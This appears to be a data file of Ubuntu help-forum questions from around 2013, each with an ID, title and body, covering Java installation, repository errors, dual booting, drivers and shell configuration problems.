325103	how to intall oracle jdk 32bit on ubuntu 12.04 64bit along side the 64bit oracle jdk	i 'm trying to transfer to 64 bit ubuntu 12.04 from 32 bit ubuntu 12.04 . adt for eclipse and the android sdk requires 32bit java but i would like to keep the 64 bit java that i just got installed to run with netbeans . is there any way to install the two side by side using apt-get or will i have to manually install the 32 bit jdk ? this is the script i am trying to use to set the path to the 32 bit jdk : # ! /bin/bash # set version jdk 32 java_home=/opt/jdk1.7.0_25-i586 classpath= . : $ java_home/lib/tools.jar : $ java_home/lib/dt.jar path= $ java_home/bin : $ path export path java_home classpath this is the result of running it : so i manually entered each command from the script then started eclipse and got this error : jvm terminated . exit code=13 /opt/jdk1.7.0_25-i586/bin/java -xms40m -xmx384m -dorg.eclipse.equinox.p2.reconciler.dropins.directory=/usr/share/eclipse/dropins -xx : maxpermsize=256m -jar /usr/lib/eclipse//plugins/org.eclipse.equinox.launcher_1.2.0.dist.jar -os linux -ws gtk -arch x86_64 -showsplash -launcher /usr/lib/eclipse/eclipse -name eclipse -- launcher.library /usr/lib/eclipse//plugins/org.eclipse.equinox.launcher.gtk.linux.x86_64_1.1.100.dist/eclipse_1408.so -startup /usr/lib/eclipse//plugins/org.eclipse.equinox.launcher_1.2.0.dist.jar -- launcher.overridevmargs -exitdata 24e8077 -vm /opt/jdk1.7.0_25-i586/bin/java -vmargs -xms40m -xmx384m -dorg.eclipse.equinox.p2.reconciler.dropins.directory=/usr/share/eclipse/dropins -xx : maxpermsize=256m -jar /usr/lib/eclipse//plugins/org.eclipse.equinox.launcher_1.2.0.dist.jar
325105	how to move my files from windows vista to ubuntu as i have both on my pc and i want to remove vista ?	i want to remove windows vista from my pc so i want to transfer all my files to ubuntu , i have n't tried any thing yet , only want to know if there is a quick and easy way of doing it .
325106	ubuntu edge/touch laptop shell	the convergence idea is really cool and i love how you can dock your phone and use it as a full desktop by connecting it to a hdmi display . however there is a piece of the convergence story missing and that is laptops . does ubuntu have plans for a laptop shell , ( screen and keyboard but no motherboard or processor ) which i can dock my ubuntu touch/edge into and have a complete laptop experience ? if not is there any hardware available or coming soon which would allow this ?
325109	what libre office ppas are available ?	i think that i have to downgrade from libreoffice 4.1.0.4 because of the bug in the time display . my previous version was 3.5.4 . is the 3.5.4 ppa still available ? do any of the versions between 3.5.4 and 4.1.0.4 handle base report writing better ?
325110	12.04 and 13.04 sharing a /home folder	would it be a bad idea to have 12.04 and 13.04 share a /home partition ? i was about to replace my hdd and was thinking of doing this . would it be especially unstable in terms any settings files which might be in conflict ?
325124	failed to download repository information . check your internet connection . random bad repositories reported	i recently started to have my system update manager coming back with nothing errors downloading repository information . when i run into this problem before , it was always a broken repository . although , the one that seems broken for me now seems to be the security.ubuntu and/or archive.ubuntu and/or any other one one . this forces the update manager to continue to inform me that : `` the package information was updated 17 days ago '' . i have tried multiple things suggested in many of the other similar questions , although they all seem to point to a bad repository . using sudo apt-get update gives the same errors , although the number of repositories that come back with a problem are inconsistent . i even tried unchecking all other software in the software manager , but still get this error . i also tried multiple different repositories servers , both the main ones , and using the recommended `` best '' one as well . i 'm not too sure what is causing this problem and any help would work . here are some of my outputs : sudo apt-get update hit http : //repo.steampowered.com precise release.gpg hit http : //repo.steampowered.com precise release hit http : //repo.steampowered.com precise/steam amd64 packages hit http : //repo.steampowered.com precise/steam i386 packages ign http : //repo.steampowered.com precise/steam translationindex ign http : //repo.steampowered.com precise/steam translation-en_ca ign http : //repo.steampowered.com precise/steam translation-en hit http : //extras.ubuntu.com precise release.gpg hit http : //extras.ubuntu.com precise release hit http : //extras.ubuntu.com precise/main amd64 packages hit http : //extras.ubuntu.com precise/main i386 packages ign http : //extras.ubuntu.com precise/main translationindex ign http : //extras.ubuntu.com precise/main translation-en_ca ign http : //extras.ubuntu.com precise/main translation-en hit http : //archive.canonical.com precise release.gpg hit http : //archive.canonical.com precise release hit http : //archive.canonical.com precise/partner amd64 packages hit http : //archive.canonical.com precise/partner i386 packages ign http : //archive.canonical.com precise/partner translationindex ign http : //archive.canonical.com precise/partner translation-en_ca ign http : //archive.canonical.com precise/partner translation-en get:1 http : //security.ubuntu.com precise-security release.gpg [ 198 b ] hit http : //security.ubuntu.com precise-security release hit http : //security.ubuntu.com precise-security/main amd64 packages hit http : //security.ubuntu.com precise-security/universe amd64 packages hit http : //security.ubuntu.com precise-security/multiverse amd64 packages hit http : //security.ubuntu.com precise-security/restricted amd64 packages hit http : //security.ubuntu.com precise-security/main i386 packages hit http : //security.ubuntu.com precise-security/universe i386 packages hit http : //security.ubuntu.com precise-security/multiverse i386 packages hit http : //security.ubuntu.com precise-security/restricted i386 packages hit http : //security.ubuntu.com precise-security/main translationindex hit http : //security.ubuntu.com precise-security/multiverse translationindex hit http : //security.ubuntu.com precise-security/restricted translationindex hit http : //security.ubuntu.com precise-security/universe translationindex hit http : //security.ubuntu.com precise-security/main translation-en hit http : //security.ubuntu.com precise-security/multiverse translation-en hit http : //security.ubuntu.com precise-security/restricted translation-en hit http : //security.ubuntu.com precise-security/universe translation-en err http : //ca.archive.ubuntu.com precise release.gpg something wicked happened resolving 'ca.archive.ubuntu.com : http ' ( -5 - no address associated with hostname ) hit http : //ca.archive.ubuntu.com precise-updates release.gpg hit http : //ca.archive.ubuntu.com precise release hit http : //ca.archive.ubuntu.com precise-updates release ign http : //ca.archive.ubuntu.com precise/main amd64 packages/diffindex ign http : //ca.archive.ubuntu.com precise/universe amd64 packages/diffindex ign http : //ca.archive.ubuntu.com precise/multiverse amd64 packages/diffindex ign http : //ca.archive.ubuntu.com precise/restricted amd64 packages/diffindex ign http : //ca.archive.ubuntu.com precise/main i386 packages/diffindex ign http : //ca.archive.ubuntu.com precise/universe i386 packages/diffindex ign http : //ca.archive.ubuntu.com precise/multiverse i386 packages/diffindex ign http : //ca.archive.ubuntu.com precise/restricted i386 packages/diffindex hit http : //ca.archive.ubuntu.com precise/main translationindex hit http : //ca.archive.ubuntu.com precise/multiverse translationindex hit http : //ca.archive.ubuntu.com precise/restricted translationindex hit http : //ca.archive.ubuntu.com precise/universe translationindex hit http : //ca.archive.ubuntu.com precise-updates/main amd64 packages hit http : //ca.archive.ubuntu.com precise-updates/universe amd64 packages hit http : //ca.archive.ubuntu.com precise-updates/multiverse amd64 packages hit http : //ca.archive.ubuntu.com precise-updates/restricted amd64 packages hit http : //ca.archive.ubuntu.com precise-updates/main i386 packages hit http : //ca.archive.ubuntu.com precise-updates/universe i386 packages hit http : //ca.archive.ubuntu.com precise-updates/multiverse i386 packages hit http : //ca.archive.ubuntu.com precise-updates/restricted i386 packages hit http : //ca.archive.ubuntu.com precise-updates/main translationindex hit http : //ca.archive.ubuntu.com precise-updates/multiverse translationindex hit http : //ca.archive.ubuntu.com precise-updates/restricted translationindex hit http : //ca.archive.ubuntu.com precise-updates/universe translationindex hit http : //ca.archive.ubuntu.com precise/main amd64 packages hit http : //ca.archive.ubuntu.com precise/universe amd64 packages hit http : //ca.archive.ubuntu.com precise/multiverse amd64 packages hit http : //ca.archive.ubuntu.com precise/restricted amd64 packages hit http : //ca.archive.ubuntu.com precise/main i386 packages hit http : //ca.archive.ubuntu.com precise/universe i386 packages hit http : //ca.archive.ubuntu.com precise/multiverse i386 packages hit http : //ca.archive.ubuntu.com precise/restricted i386 packages hit http : //ca.archive.ubuntu.com precise/main translation-en_ca hit http : //ca.archive.ubuntu.com precise/main translation-en hit http : //ca.archive.ubuntu.com precise/multiverse translation-en hit http : //ca.archive.ubuntu.com precise/restricted translation-en hit http : //ca.archive.ubuntu.com precise/universe translation-en_ca hit http : //ca.archive.ubuntu.com precise/universe translation-en hit http : //ca.archive.ubuntu.com precise-updates/main translation-en_ca hit http : //ca.archive.ubuntu.com precise-updates/main translation-en hit http : //ca.archive.ubuntu.com precise-updates/multiverse translation-en hit http : //ca.archive.ubuntu.com precise-updates/restricted translation-en hit http : //ca.archive.ubuntu.com precise-updates/universe translation-en_ca hit http : //ca.archive.ubuntu.com precise-updates/universe translation-en fetched 198 b in 20s ( 9 b/s ) w : failed to fetch http : //ca.archive.ubuntu.com/ubuntu/dists/precise/release.gpg something wicked happened resolving 'ca.archive.ubuntu.com : http ' ( -5 - no address associated with hostname ) e : some index files failed to download . they have been ignored , or old ones used instead . if i run , the same command again , i can get a different bad repository like : sudo apt-get update get:1 http : //ca.archive.ubuntu.com precise release.gpg [ 198 b ] get:2 http : //ca.archive.ubuntu.com precise-updates release.gpg [ 198 b ] hit http : //ca.archive.ubuntu.com precise release get:3 http : //ca.archive.ubuntu.com precise-updates release [ 49.6 kb ] hit http : //ca.archive.ubuntu.com precise/main amd64 packages hit http : //ca.archive.ubuntu.com precise/universe amd64 packages hit http : //ca.archive.ubuntu.com precise/multiverse amd64 packages hit http : //ca.archive.ubuntu.com precise/restricted amd64 packages hit http : //ca.archive.ubuntu.com precise/main i386 packages hit http : //ca.archive.ubuntu.com precise/universe i386 packages hit http : //ca.archive.ubuntu.com precise/multiverse i386 packages hit http : //ca.archive.ubuntu.com precise/restricted i386 packages hit http : //ca.archive.ubuntu.com precise/main translationindex hit http : //ca.archive.ubuntu.com precise/multiverse translationindex hit http : //ca.archive.ubuntu.com precise/restricted translationindex hit http : //ca.archive.ubuntu.com precise/universe translationindex get:4 http : //ca.archive.ubuntu.com precise-updates/main amd64 packages [ 663 kb ] get:5 http : //ca.archive.ubuntu.com precise-updates/universe amd64 packages [ 210 kb ] get:6 http : //ca.archive.ubuntu.com precise-updates/multiverse amd64 packages [ 13.6 kb ] get:7 http : //ca.archive.ubuntu.com precise-updates/restricted amd64 packages [ 10.1 kb ] get:8 http : //ca.archive.ubuntu.com precise-updates/main i386 packages [ 683 kb ] get:9 http : //ca.archive.ubuntu.com precise-updates/universe i386 packages [ 214 kb ] get:10 http : //ca.archive.ubuntu.com precise-updates/multiverse i386 packages [ 13.8 kb ] get:11 http : //ca.archive.ubuntu.com precise-updates/restricted i386 packages [ 10.0 kb ] hit http : //ca.archive.ubuntu.com precise-updates/main translationindex hit http : //ca.archive.ubuntu.com precise-updates/multiverse translationindex hit http : //ca.archive.ubuntu.com precise-updates/restricted translationindex hit http : //ca.archive.ubuntu.com precise-updates/universe translationindex hit http : //ca.archive.ubuntu.com precise/main translation-en_ca hit http : //ca.archive.ubuntu.com precise/main translation-en hit http : //ca.archive.ubuntu.com precise/multiverse translation-en hit http : //ca.archive.ubuntu.com precise/restricted translation-en hit http : //ca.archive.ubuntu.com precise/universe translation-en_ca hit http : //ca.archive.ubuntu.com precise/universe translation-en hit http : //ca.archive.ubuntu.com precise-updates/main translation-en_ca hit http : //ca.archive.ubuntu.com precise-updates/main translation-en hit http : //ca.archive.ubuntu.com precise-updates/multiverse translation-en hit http : //ca.archive.ubuntu.com precise-updates/restricted translation-en hit http : //ca.archive.ubuntu.com precise-updates/universe translation-en_ca hit http : //ca.archive.ubuntu.com precise-updates/universe translation-en hit http : //archive.canonical.com precise release.gpg hit http : //archive.canonical.com precise release hit http : //archive.canonical.com precise/partner amd64 packages hit http : //archive.canonical.com precise/partner i386 packages ign http : //archive.canonical.com precise/partner translationindex ign http : //archive.canonical.com precise/partner translation-en_ca ign http : //archive.canonical.com precise/partner translation-en hit http : //extras.ubuntu.com precise release.gpg hit http : //extras.ubuntu.com precise release hit http : //extras.ubuntu.com precise/main amd64 packages hit http : //extras.ubuntu.com precise/main i386 packages ign http : //extras.ubuntu.com precise/main translationindex ign http : //extras.ubuntu.com precise/main translation-en_ca ign http : //extras.ubuntu.com precise/main translation-en get:12 http : //security.ubuntu.com precise-security release.gpg [ 198 b ] get:13 http : //security.ubuntu.com precise-security release [ 49.6 kb ] get:14 http : //security.ubuntu.com precise-security/main amd64 packages [ 296 kb ] get:15 http : //security.ubuntu.com precise-security/universe amd64 packages [ 79.8 kb ] get:16 http : //security.ubuntu.com precise-security/multiverse amd64 packages [ 2,186 b ] get:17 http : //security.ubuntu.com precise-security/restricted amd64 packages [ 4,627 b ] get:18 http : //security.ubuntu.com precise-security/main i386 packages [ 311 kb ] get:19 http : //security.ubuntu.com precise-security/universe i386 packages [ 82.5 kb ] get:20 http : //security.ubuntu.com precise-security/multiverse i386 packages [ 2,371 b ] get:21 http : //security.ubuntu.com precise-security/restricted i386 packages [ 4,620 b ] hit http : //security.ubuntu.com precise-security/main translationindex hit http : //security.ubuntu.com precise-security/multiverse translationindex hit http : //security.ubuntu.com precise-security/restricted translationindex hit http : //security.ubuntu.com precise-security/universe translationindex hit http : //security.ubuntu.com precise-security/main translation-en hit http : //security.ubuntu.com precise-security/multiverse translation-en hit http : //security.ubuntu.com precise-security/restricted translation-en hit http : //security.ubuntu.com precise-security/universe translation-en err http : //repo.steampowered.com precise release.gpg something wicked happened resolving 'repo.steampowered.com : http ' ( -5 - no address associated with hostname ) hit http : //repo.steampowered.com precise release ign http : //repo.steampowered.com precise/steam amd64 packages/diffindex ign http : //repo.steampowered.com precise/steam i386 packages/diffindex ign http : //repo.steampowered.com precise/steam translationindex hit http : //repo.steampowered.com precise/steam amd64 packages hit http : //repo.steampowered.com precise/steam i386 packages ign http : //repo.steampowered.com precise/steam translation-en_ca ign http : //repo.steampowered.com precise/steam translation-en fetched 2,701 kb in 21s ( 124 kb/s ) w : failed to fetch http : //repo.steampowered.com/steam/dists/precise/release.gpg something wicked happened resolving 'repo.steampowered.com : http ' ( -5 - no address associated with hostname ) e : some index files failed to download . they have been ignored , or old ones used instead . are there any suggestions as to what i need to start looking at for the problem ?
325131	ubuntu terminal transparency is not working as expected	upon changing the settings of my terminal 's transparency using the sliding bar , it simply turns darker , i.e . the transparency is reduced further . my graphics card : intel ivy bridge mobile x86/mmx/sse2 so please do suggest something guys ... thanks. ! !
325132	help ! how to connect to hard drive that is connected to router ?	i am wondering if one of you can help me out . i am a window guy and do not know anything about ubuntu . however , i have a computer that i am using for work that is running ubuntu because the software that needs to be ran in ubuntu . i need to transfer files constantly between ubuntu and window . what i have been doing is saving the files in a usb stick drive , and then plug that stick drive to the window machine ... .100 times a day ! well , many times a day . i replaced my router with the one that has usb , and bought an external hard drive so i can transfer file easily . i set it up in window , but have no clue how to do it on ubuntu . would you be able to do a step by step in how to do this ? consider this step by step for dummies . i got the router ip address already . best if you can email me directly matdj1 @ gmail.com or you can post it here . i really appreciate it ... and thanks !
325140	command substitiution problem , confused	i am trying to have sox play a file from user input . to do this , i set up a command like the one below : $ play proc/ $ ( read -n 1 ) .wav i have files 0.wav through 9.wav located in the directory proc . i can play one of them like the example below : $ play proc/4.wav however , when i try to do it with user input , i press the number 4 and this is what it outputs : 4play fail formats : ca n't open input file `proc/.wav ' : no such file or directory any ideas ? i 'm confused .
325143	how to revamp my hard-drive and then do a dual-boot windows xp and ubuntu 12.04 lts ubuntu currently installed	i had ubuntu 12.04 lts on a second hand pc i bought sometime back and i have to say its better than windows any day . however now i need both windows and ubuntu on my pc . i 've already backed up data and burned a windows xp sp3 installation cd . one of my biggest problem is that my hard drive has about 4-5 partitions and 2 unallocated of about 5 gb and 7 mb . i have put a screenshot of gparted . i really do n't know much about computers in details so i want everything to go smoothly . here 's what i 'm going for : undoing all partitions into one . installing windows xp create a second partition install ubuntu 12.04 lts hard drive is about 320 gb sata . how to undo partitions . should i go in for a complete format ? much appreciated if anyone can guide me here . thanks a lot !
325151	how to upload software written in gambas into a launchpad ppa ?	i have a software written in gambas 3 , which i need a ppa to store it . i 've heard that launchpad builds packages by the source , and does not accept user built deb packages . does launchpad have a gambas 3 compiler , to compile my source package ? if not , how can i host my gambas based software in launchpad ? thanks ! note : i have already made a ppa & signed the code of conduct .
325155	is it ok , if i install ubuntu linux mint and windows in c drive ?	i already had windows 7 os , then i install linux mint 15 in c , now i want to have ubuntu in c , may it create any problem , because i have reached to maximum partition of my hard disk . so can not create a seperate drive . please assist me .
325160	how do i install ubuntu on an already created partition	i have bur n't ubuntu 13.04 to a dvd and have it running on my apple macbook . now i want to install ubuntu without harming osx . i have created a partition on osx which i would like to install ubuntu on . is it possible to install ubuntu on that partition that was made by osx and if so how ? thanks for all the help jai
325163	missing python in libreoffice organize macros menu	i have the libreoffice 4.0.2.2 that comes with ubuntu 13.04 . the tools-macros-organize macros menu only shows the libreoffice basic item . i assumed i would find also python and other languages . this post and many other posts talk about it , but i ca n't find it . was my assumption wrong ? do i need to install something ?
325167	i ca n't find my iso/zip file for step 2 in the universal usb installer process	i ca n't seem to finish the unviersal usb installer process . step 2 say ; i need to select my ubuntu-12.10*desktop*.iso where can i find that , as i have already downloaded unbuntu but i think it is for the dvd .
325168	dual booting windows 8 and ubuntu 12.04	i recently purchased a dell inspiron 3521 with windows 8 pre-installed . i then installed ubuntu 12.04.2 on it . both os 's are running fine for now but the problem is that i have to manually go into bios on startup and switch between legacy and uefi mode to boot into ubuntu and windows respectively . is there anyway that i can just get grub to ask me on startup which os i want to boot ? in case it is important , here 's what i did to install ubuntu - i shrank the windows partition and then disabled secureboot and switched to legacy mode . while installing ubuntu from the live cd , it did not detect that my system already had windows 8 installed . i chose to manually allot partitions to / , /home , swap , /boot during installation . it also told me that there needs to be a reserved bios setup partition , so i let it create that . any help would be much appreciated .
325169	i am trying to check the mysql bind address int the terminal but keep getting error can someone help ?	i am trying to check the mysql bind address in the terminal using the command cat/etc/hosts | grep localhosts that i got offline , but i keep getting a bash : cat/etc/hosts : no such file or directory error can someone please help ?
325171	zombies are taking over my computer	i can see several zombie processes in my computer . how can i get rid of them ? in fact , why does there exist vlc and pidgin zombies ? it this a bug in ubuntu or something i have done ? thanks ! ps aux |grep z user pid % cpu % mem vsz rss tty stat start time command sammy 3236 0.0 0.0 0 0 ? zl heinä26 0:01 [ vlc ] < defunct > sammy 4028 0.0 0.0 0 0 ? zl heinä26 0:00 [ vlc ] < defunct > sammy 4046 0.0 0.0 0 0 ? zl heinä26 0:00 [ vlc ] < defunct > sammy 4060 0.0 0.0 0 0 ? zl heinä26 0:00 [ vlc ] < defunct > sammy 4841 0.0 0.0 0 0 ? z heinä26 0:00 [ pidgin ] < defunct > sammy 4844 0.0 0.0 0 0 ? z heinä26 0:00 [ pidgin ] < defunct > sammy 6525 0.0 0.0 0 0 ? z heinä26 0:00 [ pidgin ] < defunct > sammy 6529 0.0 0.0 0 0 ? z heinä26 0:00 [ pidgin ] < defunct > sammy 8401 0.0 0.0 0 0 ? zl heinä26 0:00 [ vlc ] < defunct > sammy 13526 0.0 0.0 0 0 ? z 09:54 0:00 [ pidgin ] < defunct >
325174	how can i get skype video working on ubuntu 12.04 64bit	i understand it requires , libv4l1 but i can not get 32bit version for it , for some reason from apt-get . locate libv4l /usr/lib/vlc/plugins/access/libv4l2_plugin.so /usr/lib/x86_64-linux-gnu/libv4l /usr/lib/x86_64-linux-gnu/libv4l1.so.0 /usr/lib/x86_64-linux-gnu/libv4l2.so.0 /usr/lib/x86_64-linux-gnu/libv4lconvert.so.0 /usr/lib/x86_64-linux-gnu/libv4lconvert0 /usr/lib/x86_64-linux-gnu/libv4l/v4l1compat.so /usr/lib/x86_64-linux-gnu/libv4l/v4l2convert.so /usr/lib/x86_64-linux-gnu/libv4lconvert0/ov511-decomp /usr/lib/x86_64-linux-gnu/libv4lconvert0/ov518-decomp ... and so on .
325176	is there a web based vnc viewer + server for ubuntu ?	i 'm looking for a web based vnc viewer + server for ubuntu 12.04 lts server ( using xorg + openbox ) , and how to set up them .
325177	sound volume keys sometimes stop working in 13.04	i have a ubuntu 13.04 installation ( with xubuntu-desktop installed if that matters ) . my problem is that sometimes the sound hotkeys ( fn + f10 / f11 /f12 ) just stop working ( i can still change the sound volume from the sound applet ) . i 've tried running xev - it looks like the system just ignores these hotkeys ( nothing is shown in the output ) . not sure if this is a related problem , but when the system boots , the sound level is always set to maximum as soon as , e.g. , screen brightness level is remembered and restored correctly . p.s . my hardware is eeepc 1005ha . the system is not a clean installation , it 's being upgraded since 9.10 .
325178	icons in desktop	i 've read some threads about this subject but i think none addresses my case . i think it happened after trying to run a phyton script as super user . now if i put an icon in the desktop i do n't see it . it seems to me that it is there but in a screen region outside the visible range . i say this because if i put many icons in the desktop some are shown . so , my question is how can i config the desktop so all it 's area is visible . i 'm using ubuntu 12.04 lts . thanks in advance , luis vital
325183	will mir have remote display capabilities ?	x clients can be displayed on any x server over the network . this is convenient when working in a complex environment . there are other technologies that address this area as vnc , spice and nx , but will mir do this natively ? or will mir comply and optimise with other protocols like spice ?
325186	browsing internet problem	i continuously have a problem with browsing internet on dell laptop through wi-fi . the problem occurs suddenly , firefox and chrome refuse to find a resource , the interesting part is the connection is ok , skype works , pings is ok. inversigation : restarting browsers does n't help . disabling/enabling wi-fi does n't help . disabling/enabling networking does n't help . retrive resources by ip does n't help . lowering mtu to 1400 does n't help . downgrade to ubuntu 12.04 lts does n't help . logout/login does n't help . temporary solution : only full restart helps . ( not logout/login , but switch off and switch on ) terrible consequences : this laptop belongs to my girlfriend , and she threatens me , and demands to install windows . i can not stay any longer . so far i do n't know what is the solution . please help me to solve it , i will provide you with any needed infomation , log , etc .
325187	accidentally applied color profile	i accidentally applied a color profile to my display in the color application in system settings . i was wondering if any one knew how to revert this , as there is no revert option in the window . i am currently running 13.04 any suggestions ?
325188	possible to encrypt windows 7 with truecrypt with wubi installed ?	so i 've done some googling and most of the results are a lot older than i 'd hope . i currently have windows 7 installed with ubuntu 12.10 installed via wubi . i only want windows encrypted , and do not care about ubuntu . without removing wubi , is it possible to encrypt just windows using truecrypt ?
325194	teamviewer ctrl-alt does n't work	i connect from ubuntu 13.04 ( gnome ) to windows 7 through teamviewer teamviewer windows - 8.0.19617 teamviewer ubuntu - 8.0.17.147 the 'send key ' combination option in teamviewer is enabled . ctrl-alt keys do n't work . if i press ctrl-alt , i can select the open windows in ubuntu , but not in windows 7 on remote . what is the problem ?
325198	ubuntu server + window manager + network applet	i 'm trying to build a minimal desktop system on top of ubuntu server 13.04 , and i 've got the i3 window manager running . apparently the standard nm-applet package is no longer in the ubuntu repos , and when i try to install the network-manager package , apt-get tries to pull down the entire gnome desktop with it , which is no good to me . so my question is , is anyone aware of any other network manager/indicator applet in the repos that wo n't require me to pull down an entire desktop environment ?
325200	install ubuntu on hcl beanstalk desktop ?	i currently have a hcl beanstalk desktop pc which is quite old now . i have another shared and quite new hcl laptop with intel core i3 processor and it came with ubuntu 12.04 lts on it as it is a government laptop . having used ubuntu on that laptop now , i wish to install ubuntu on my desktop as well . can someone please provide me the link for the desktop version as i am quite a n00b in these matters and might end up with a bricked desktop . and after download , how do i install it from boot dvd ?
325201	`` simple touch ui '' not available in ubuntu-sdk	i 've installed the ubuntu-sdk according to this : sudo add-apt-repository ppa : ubuntu-sdk-team/ppa & & sudo apt-get update & & sudo apt-get install ubuntu-sdk but when following the tutorial i find some discrepancies between the tutorial and my setup . it says : select the projects > ubuntu > simple touch ui template and click but all i get is so i choose to go html5 and two steps further i 'm at the kit selection page which says no valid kits found . any ideas where to go from here ? the system is ubuntu 13.04
325205	13.04 boot problem	i 'm trying to install 13.04 on an 80gb ide hdd . i 've booted from the cd and set sda1 as the primary boot partition using ext4 filesystem and to format/mount as / i 've set sda2 as a small ( 3gb ) swap partition and set the file system as such . ubuntu installed okay ( said to restart , ejected disc but did n't power itself off so had to power of manually - would that cause the problem ? ) . i have changed the bios back to boot from the hdd but now the bios does n't recognise the hdd and i get 'operating system not found ' ? i 've already tried the setting 'large disc access ' in bios ( either dos or other ) , neither work . any help would be very much appreciated !
325206	wireless driver installation ( bcm4312 )	i have just installed lubuntu 12.10 in my lenovo ideapad s10 ( do n't know the exact series ) . i have broadcom bcm4312 wireless chipset for my wi-fi and i have tried installing the firmware using the sudo apt-get install firmware-b43-installer command but it says e : unable to locate package firmware-b43-installer . what should i do now ? i am fairly new to ubuntu and do n't really understand that much about computers so help very much needed ! thanks in advance
325213	old ubuntu , new windows	i 've been using ubuntu 13.04 that was installed inside windows 8 on my c drive . i did a lot of customization to ubuntu to make it more beautiful , and had lots of software installed . i had to reinstall windows as it got corrupted , and before reinstalling windows ( i did a fresh installation ) i made a backup of 'ubuntu ' folder ( that 's in c drive ) hoping that after reinstalling i could manually set a path to wubi to avoid redoing all my efforts to make my ubuntu as earlier . i used this how to restore the wubi ubuntu bootloader tutorial as a reference . by doing this i am getting : error : no such device : foc ... ... ... ... . ( a long code ) error : unknown filesystem . error : you need to load the kernel first . press any key to continue ... .. so , i tried one more thing . i reinstalled ubuntu on c drive , and replaced the ubuntu folder by an older one that i took a backup of . getting : error : no such device : foc ... ... ... ... . ( a long code ) error : file '/ubuntu/disks/root.disk ' not found press any key to continue ... .. so my question is : am i thinking of doing some infeasible thing , or is it possible to run old ubuntu in a new windows installation . if so , how ? i really want to get my ubuntu back . i appreciate any help .
325217	forcefully loading only nvidia graphics on boot , and not intel integrated ?	well , i have checked what graphics i am currently using and it is the intel integrated graphics driver . i have installed bumblebee successfully for my nvidia gt555m but i need to load it to play my games , however i ca n't switch because i have no idea how . i 've been looking everywhere and ca n't seem to find a definite answer . i am using ubuntu 13.04 , on a laptop . everything is working fine as-is , i just need to be able to use my dedicated graphics , i do n't mind if my integrated graphics is completely disabled when i boot up . please help : ) .
325218	i have installed lamp server in ubuntu 13,04 .but could not login to phpmyadmin	i have installed lamp server in ubuntu 13,04 .but could not login to phpmyadmin , showing the error message # 1045 can not log in to the mysql server , and connection for controluser as defined in your configuration failed . please give me a solution
325223	ubuntu wlan drivers installation . ( netwjork w522u and zyxel awd 2205 ) ubuntu 10.04	at beginning i must to say i 'm sorry for my bad english . i have both of the wlan adapters and i tried to install drivers but they are not doing anything . there are what i had do : i bought zyxel nwd2205 usb wlan adapter . my ubuntu does not found it but command lsusb did it . so , i download the driver from realtech home page , and i installed in . it were work , i can go to internet and anything . driver does not work now . i do n't know when it stopped , and i does n't had install ubuntu before it . i tried to install driver again . it freezes my ubuntu . mouse does not move , clock stops , keyboard does not do anything ... i buy netwjork w522u usb wlan adapter . it have a linux driver with it . i run it with command `` sudo make '' and it prints no error , but ubuntu still do n't find it . i install ndikswrapper and i try it . both windows drivers make error . i write this message , hope it works . okay , i did all this , and my wlan still not working , my computer does not find the drivers . information about my computer : 2001 , so over 10 years old , run windows xp before i installed ubuntu fujitsu siemens computers : scaleo 600 information about wlan : modem is zyxel ( i do n't remember the model ) i have netwjork w522u and zyxel awd 2205 , both usb . my ubuntu is 10.04 lts , with no support . so can somebody tell me what i am doing wrong or tell me what i need to buy to get working wlan in ubuntu ? must i have install newer ubuntu ( 10.04 not supported anymore ) thanks for the help average .
325226	evince fonts trouble	always when i download articles from citeseerx.ist.psu.edu in pdf format i get something non-readable . i do n't know how to describe it correctly , so just see screenshot : you can see , that in preview pages looks correct , but not in main window . when i download ps version everything is ok. evince 3.4.0 , ubuntu 12.04 i think it 's fonts troubles , but do n't know how to fix it .
325229	hspa 3g modem manager for backtrack/ubuntu	i am getting problem with a 3g mobile broadband modem/dongle . is there any free program available for ubuntu to operate over 3g modem . i am having problem with instruction came with modem . is their any other trick to connect modem . any command line tool or gui app please that can be used with different modems
325231	combining two laptops to increase memory	i have two laptops with the following specs and i want to connect them to increase memory so that i can increase the performance of the scientific calculations that i need to do at home . hp pavilion dv6 intel ( r ) core ( tm ) 2 duo cpu t6500 @ 2.10ghz 3.00 gb ram sony vaio pcg-384l intel ( r ) core ( tm ) 2 duo cpu t7700 @ 2.40ghz 2.00gb ram by the way , sony laptop does not have a monitor , which is broken , so i am using it with an external monitor . now , i want to connect these laptops so that my matlab , fortran and c++ programs run better . from time to time , i need to use my home computers to do some work . so , how can i achieve that ? what would i need to buy or install to the systems ? the most important point that bears my mind is that i also run mac os x with my sony laptop , but i can not run it with hp because it does not support vt-x . is there anything special that i have to do in order to run mac still after i connect these laptops ? kubuntu 12.04 is installed in hp , ubuntu 12.04 is installed in sony ( i prefer kubuntu for my hp laptop for several reasons and therefore i do not want to change it ) . i know this is a long question , but i could n't figure out what to do . thank you
325232	should i download java 's tar.gz or rpm to do offline java installation ?	i am going to download & install java on ubuntu 12.04 lts ( 32-bit system ) on java download page , there are 2 download options . java for linux platforms java for rpm based linux platforms which would be better suited for ubuntu ?
325234	i 'm getting an error message `` the request or reply is too large ''	when i am using squid proxy in the server , i 'm getting an error message `` the request or reply is too large '' from any node in the lan . how can i solve this ?
325235	command-line to switch between profiles in gnome-terminal	i created a new profile for gnome-terminal and i can switch between `` implicit '' profile and the new created profile as you can see in the below image : now i wonder how can i switch between profiles using a command-line/script or maybe using a shortcut for this . note : solutions like : gnome-terminal -- tab-with-profile=implicit & & exit are excluded because i prefer not to close and open another terminal or get another terminal window in this process of changing the profile .
325237	installation - wubi.exe does nothing	i downloaded the iso for v13.04 . i mounted it and tried to execute wubi.exe but nothing happens . tried both 32bit and 64 version . tried to run it with anti-virus turned off but i do n't even get an error message .
325244	trouble with one command	i was read this article in efy times : http : //www.efytimes.com/e1/fullnews.asp ? edid=111978 and i put twice the command : echo 'man `ls /usr/bin | shuf -n 1` ' > > ~/.bashrc and now always when i open my terminal appears twice random commands . and after i put the command : echo dman `ls /usr/bin | shuf -n 1`â > > ~/.bashrc and now when i open my terminal appears : the program dman dont be installed you can install it write sudo apt-get install bikeshed but i dont want install it . how i can erase all this when i open my terminal ? thank you !
